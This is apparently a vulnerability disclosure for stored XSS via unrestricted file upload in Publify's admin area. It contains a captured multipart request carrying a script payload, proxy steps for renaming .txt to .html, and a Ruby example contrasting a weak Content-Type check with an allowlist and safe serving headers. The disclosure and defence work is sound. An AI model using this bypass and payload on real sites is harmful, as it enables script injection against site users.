Unrestricted file upload: the upload form's protection against HTML files can be bypassed by selecting a .txt file and renaming it to .html in the intercepted request. The renamed file is accepted and served as HTML, giving stored XSS. The request below was captured from an authenticated session with access to /admin/resources (session cookie and CSRF token redacted).
POST /admin/resources/upload HTTP/1.1
Host: demo-publify.herokuapp.com
Cookie: _publify_blog_session=SESSION_HERE
Content-Length: 649
Upgrade-Insecure-Requests: 1
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryR7LwpeBoKn4f7hI5
Referer: https://demo-publify.herokuapp.com/admin/resources
Accept-Encoding: gzip, deflate
Accept-Language: pt-BR,pt;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="utf8"
✓
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="authenticity_token"
TOKEN_HERE
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="upload"; filename="w00t.txt"   <-- change to filename="w00t.html" before forwarding (Step 2); the Content-Type line below is left as text/plain
Content-Type: text/plain
<script>alert('OOPSS');</script>
------WebKitFormBoundaryR7LwpeBoKn4f7hI5
Content-Disposition: form-data; name="commit"
Upload
------WebKitFormBoundaryR7LwpeBoKn4f7hI5--
Step 1 - Select a .txt file in the upload form and intercept the request in a proxy
Step 2 - Change the filename extension in the Content-Disposition header from .txt to .html
Step 3 - Forward the request; the file is uploaded successfully and, when opened, is rendered as HTML and the script executes in the blog's origin
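The following is an added example, not Publify's code: it rebuilds the multipart body from the request above (the only field the attacker edits is the filename), parses it the way the server would, and contrasts a hypothetical check that looks only at the client-supplied Content-Type with an extension-allowlist check. The function names, the allowlist and the weak check are assumptions that model the observed behaviour, not Publify's actual implementation.

```ruby
# Added example, not Publify's code: reconstructs the two uploads from the
# report and contrasts a type-only check with an allowlist check. The
# multipart body is constructed from the request shown above; the validator
# names and the "weak" check are hypothetical models of the observed behaviour.
require 'set'

BOUNDARY = '----WebKitFormBoundaryR7LwpeBoKn4f7hI5'

# Constructed request body: identical to the captured one except for the
# filename, which is the only field the attacker edits in the proxy.
def build_body(filename)
  [
    "--#{BOUNDARY}\r\nContent-Disposition: form-data; name=\"utf8\"\r\n\r\n\u2713\r\n",
    "--#{BOUNDARY}\r\nContent-Disposition: form-data; name=\"authenticity_token\"\r\n\r\nTOKEN_HERE\r\n",
    "--#{BOUNDARY}\r\nContent-Disposition: form-data; name=\"upload\"; filename=\"#{filename}\"\r\n" \
      "Content-Type: text/plain\r\n\r\n<script>alert('OOPSS');</script>\r\n",
    "--#{BOUNDARY}\r\nContent-Disposition: form-data; name=\"commit\"\r\n\r\nUpload\r\n",
    "--#{BOUNDARY}--\r\n"
  ].join
end

# Minimal multipart/form-data parser: returns one hash per part with the
# field name, client-supplied filename, declared Content-Type and raw body.
def parse_multipart(body, boundary)
  body.split("--#{boundary}").map do |chunk|
    chunk = chunk.sub(/\A\r\n/, '')
    next if chunk.empty? || chunk.start_with?('--')   # preamble / closing delimiter
    header_blob, _, content = chunk.partition("\r\n\r\n")
    headers = header_blob.split("\r\n").map { |h| h.split(': ', 2) }.to_h
    disp = headers['Content-Disposition'].to_s
    { name: disp[/name="([^"]*)"/, 1],
      filename: disp[/filename="([^"]*)"/, 1],
      content_type: headers['Content-Type'],
      body: content.sub(/\r\n\z/, '') }
  end.compact
end

def upload_part(filename)
  parse_multipart(build_body(filename), BOUNDARY).find { |p| p[:name] == 'upload' }
end

# Weak check (hypothetical): rejects HTML only by the declared Content-Type,
# which the attacker controls. Both uploads pass because the part still
# says text/plain.
BLOCKED_TYPES = Set['text/html', 'application/xhtml+xml', 'image/svg+xml']
def weak_allowed?(part)
  !BLOCKED_TYPES.include?(part[:content_type].to_s.downcase)
end

# Hardened check: allowlist extensions, derive the stored MIME type from the
# extension rather than the request, and require the two to agree.
ALLOWED = { 'txt' => 'text/plain', 'png' => 'image/png',
            'jpg' => 'image/jpeg', 'pdf' => 'application/pdf' }.freeze
def ext_of(filename)
  File.extname(File.basename(filename.to_s)).delete_prefix('.').downcase
end
def strict_allowed?(part)
  ext = ext_of(part[:filename])
  ALLOWED.key?(ext) && ALLOWED[ext] == part[:content_type].to_s.downcase
end

# Headers for serving a stored upload: type from the allowlist, download
# rather than inline render, and no MIME sniffing, so even a file that slips
# through is not executed in the blog's origin.
def safe_headers(stored_name)
  { 'Content-Type' => ALLOWED.fetch(ext_of(stored_name), 'application/octet-stream'),
    'Content-Disposition' => "attachment; filename=\"#{File.basename(stored_name)}\"",
    'X-Content-Type-Options' => 'nosniff' }
end

if $PROGRAM_NAME == __FILE__
  %w[w00t.txt w00t.html].each do |name|
    part = upload_part(name)
    puts "#{name}: weak=#{weak_allowed?(part)} strict=#{strict_allowed?(part)}"
  end
end
```

Running it prints that w00t.txt passes both checks while w00t.html passes only the weak one: a check keyed on the declared Content-Type cannot distinguish the two requests, because that header is the same in both. The serving headers are the second layer: with the type derived server-side, Content-Disposition: attachment and nosniff, a stored file is downloaded rather than rendered, so a bypass of the upload check no longer yields script execution in the site's origin.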
PoC video: https://drive.google.com/file/d/1bNffqwUl_9Sn7wqpBvEAqvV_PGRadlPb/view?usp=sharing